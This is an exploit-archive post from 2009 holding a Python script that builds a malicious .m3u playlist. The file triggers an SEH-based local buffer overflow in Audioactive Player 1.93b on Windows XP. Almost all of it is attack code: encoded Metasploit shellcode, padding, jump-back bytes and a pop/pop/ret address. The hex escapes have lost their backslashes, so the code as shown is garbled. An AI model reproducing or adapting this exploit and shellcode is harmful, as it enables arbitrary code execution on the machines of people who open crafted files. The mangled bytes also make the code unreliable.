audioactive193b-overflow.txt
Posted on 16 May 2009
#usage: exploit.py #Open the program then double clic in the exploit file print "**************************************************************************" print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH) " print " Credits : hack4love " print " Seh Exploit: His0k4 " print " Tested on: Windows XP Pro SP3 (EN) " print " Greetings to:" print " All friends & muslims HaCkers(dz),snakespc.com " print "**************************************************************************" # win32_exec - EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com shellcode=( "xfcxbbx5dx53x65x97xebx0cx5ex56x31x1exadx01xc3x85" "xc0x75xf7xc3xe8xefxffxffxffxa1xbbx21x97x59x3cx21" "xd2x65xb7x49xd8xedxc6x5ex69x42xd1x2bx31x7cxe0xc0" "x87xf7xd6x9dx19xe9x26x62x80x59xccxa2xc7xa6x0cxe8" "x25xa9x4cx06xc1x92x04xfdx2ex91x41x76x71x7dx8bx62" "xe8xf6x87x3fx7ex57x84xbex6bxecxa8x4bx6ax19x59x17" "x49xd9x99x99x51x85x96x9ax61xc0x69x62x8ex41x29x9f" "x05x25xb6x32x92xadxcexa7xacxa6x4fx87xafxb8x4fx63" "xc7x84x10x42xeex94xf8x2dxf6xd7xc5x55x57xbfx35x23" "x53x60xdexacxa2x14x10x9axa5xcfx4ex45x36x6cx91x85" "xc6x72x91x85xc6") payload = "x41"*(589-len(shellcode)) payload += shellcode payload += "xE9x56xFFxFFxFF" # go back payload += "x74xF9xFFxFF" #go back payload += "xDEx19xD1x72" # Friendly p/p/r msacm32.drv payload += "x44"*900 try: out_file = open("exploit.m3u",'w') out_file.write("http://www.google.com/"+payload+".mp3 ") out_file.close() raw_input(" Exploit file created! ") except: print "Error"
